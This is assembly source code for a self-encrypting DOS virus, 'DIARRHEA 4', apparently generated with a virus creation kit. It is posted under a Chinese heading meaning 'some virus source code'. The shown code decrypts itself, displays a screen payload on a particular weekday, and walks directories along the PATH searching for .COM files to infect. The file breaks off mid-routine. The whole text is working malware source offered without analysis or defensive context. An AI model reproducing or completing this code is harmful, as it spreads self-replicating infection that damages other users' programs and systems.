diarrhe4.asm

一些病毒源代码

; DIARRHE4.ASM -- DIARRHEA 4
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by URNST KOUCH

virus_type      equ     0                       ; Appending Virus
is_encrypted    equ     1                       ; We're encrypted
tsr_virus       equ     0                       ; We're not TSR

code            segment byte public
		assume  cs:code,ds:code,es:code,ss:code
		org     0100h

main            proc    near
		db      0E9h,00h,00h            ; Near jump (for compatibility)
start:          call    find_offset             ; Like a PUSH IP
find_offset:    pop     bp                      ; BP holds old IP
		sub     bp,offset find_offset   ; Adjust for length of host

		call    encrypt_decrypt         ; Decrypt the virus

start_of_code   label   near

		lea     si,[bp + buffer]        ; SI points to original start
		mov     di,0100h                ; Push 0100h on to stack for
		push    di                      ; return to main program
		movsw                           ; Copy the first two bytes
		movsb                           ; Copy the third byte

		mov     di,bp                   ; DI points to start of virus

		mov     bp,sp                   ; BP points to stack
		sub     sp,128                  ; Allocate 128 bytes on stack

		mov     ah,02Fh                 ; DOS get DTA function
		int     021h
		push    bx                      ; Save old DTA address on stack

		mov     ah,01Ah                 ; DOS set DTA function
		lea     dx,[bp - 128]           ; DX points to buffer on stack
		int     021h

		call    get_weekday
		cmp     ax,0005h                ; Did the function return 5?
		je      strt00                  ; If equal, do effect
		jmp     end00                   ; Otherwise skip over it
strt00:         lea     si,[di + data00]        ; SI points to data
		mov     cx,0107h                ; Second argument is 263
		push    di                      ; Save DI
		push    es                      ; Save ES

		jcxz    uncrunch_done           ; Exit if there are no characters

		mov     ah,0Fh                  ; BIOS get screen mode function
		int     10h
		xor     ah,ah                   ; BIOS set screen mode function
		int     10h                     ; Clear the screen

		xor     di,di
		mov     ax,0B800h               ; AX is set to video segment
		mov     es,ax                   ; ES holds video segment

		mov     dx,di                   ; Save X coordinate for later
		xor     ax,ax                   ; Set current attributes
		cld

loopa:          lodsb                           ; Get next character
		cmp     al,32                   ; Is it a control character?
		jb      foreground              ; Handle it if it is
		stosw                           ; Save letter on screen
next:           loop    loopa                   ; Repeat until we're done
		jmp     short uncrunch_done     ; Leave this routine

foreground:     cmp     al,16                   ; Are we changing the foreground?
		jnb     background              ; If not, check the background
		and     ah,0F0h                 ; Strip off old foreground
		or      ah,al                   ; Put the new one on
		jmp     short next              ; Resume looping

background:     cmp     al,24                   ; Are we changing the background?
		je      next_line               ; If AL = 24, go to next line
		jnb     flash_bit_toggle        ; If AL > 24 set the flash bit
		sub     al,16                   ; Change AL to a color number
		add     al,al                   ; Crude way of shifting left
		add     al,al                   ; four bits without changing
		add     al,al                   ; CL or wasting space.  Ok,
		add     al,al                   ; I guess.
		and     al,08Fh                 ; Strip off old background
		or      ah,al                   ; Put the new one on
		jmp     short next              ; Resume looping

next_line:      add     dx,160                  ; Skip a whole line (80 chars.
		mov     di,dx                   ; AND 80 attribs.)
		jmp     short next              ; Resume looping

flash_bit_toggle: cmp   al,27                   ; Is it a blink toggle?
		jb      multi_output            ; If AL < 27, it's a blinker
		jne     next                    ; Otherwise resume looping
		xor     ah,128                  ; Toggle the flash bit
		jmp     short next              ; Resume looping

multi_output:   cmp     al,25                   ; Set Zero flag if multi-space
		mov     bx,cx                   ; Save main counter
		lodsb                           ; Get number of repititions
		mov     cl,al                   ; Put it in CL
		mov     al,' '                  ; AL holds a space
		jz      start_output            ; If displaying spaces, jump
		lodsb                           ; Otherwise get character to use
		dec     bx                      ; Adjust main counter

start_output:   xor     ch,ch                   ; Clear CH
		inc     cx                      ; Add one to count
	rep     stosw                           ; Display the character
		mov     cx,bx                   ; Restore main counter
		dec     cx                      ; Adjust main counter
		loopnz  loopa                   ; Resume looping if not done

uncrunch_done:  pop     es                      ; Restore ES
		pop     di                      ; Restore DI

end00:          call    search_files            ; Find and infect a file


com_end:        pop     dx                      ; DX holds original DTA address
		mov     ah,01Ah                 ; DOS set DTA function
		int     021h

		mov     sp,bp                   ; Deallocate local buffer

		xor     ax,ax                   ;
		mov     bx,ax                   ;
		mov     cx,ax                   ;
		mov     dx,ax                   ; Empty out the registers
		mov     si,ax                   ;
		mov     di,ax                   ;
		mov     bp,ax                   ;

		ret                             ; Return to original program
main            endp

search_files    proc    near
		mov     bx,di                   ; BX points to the virus
		push    bp                      ; Save BP
		mov     bp,sp                   ; BP points to local buffer
		sub     sp,135                  ; Allocate 135 bytes on stack

		mov     byte ptr [bp - 135],'\' ; Start with a backslash

		mov     ah,047h                 ; DOS get current dir function
		xor     dl,dl                   ; DL holds drive # (current)
		lea     si,[bp - 134]           ; SI points to 64-byte buffer
		int     021h

		call    traverse_path           ; Start the traversal

traversal_loop: cmp     word ptr [bx + path_ad],0       ; Was the search unsuccessful?
		je      done_searching          ; If so then we're done
		call    found_subdir            ; Otherwise copy the subdirectory

		mov     ax,cs                   ; AX holds the code segment
		mov     ds,ax                   ; Set the data and extra
		mov     es,ax                   ; segments to the code segment

		xor     al,al                   ; Zero AL
		stosb                           ; NULL-terminate the directory

		mov     ah,03Bh                 ; DOS change directory function
		lea     dx,[bp - 70]            ; DX points to the directory
		int     021h

		lea     dx,[bx + com_mask]      ; DX points to "*.COM"
		push    di
		mov     di,bx
		call    find_files              ; Try to infect a .COM file
		mov     bx,di
		pop     di
		jnc     done_searching          ; If successful the exit
		jmp     short traversal_loop    ; Keep checking the PATH

done_searching: mov     ah,03Bh                 ; DOS change directory function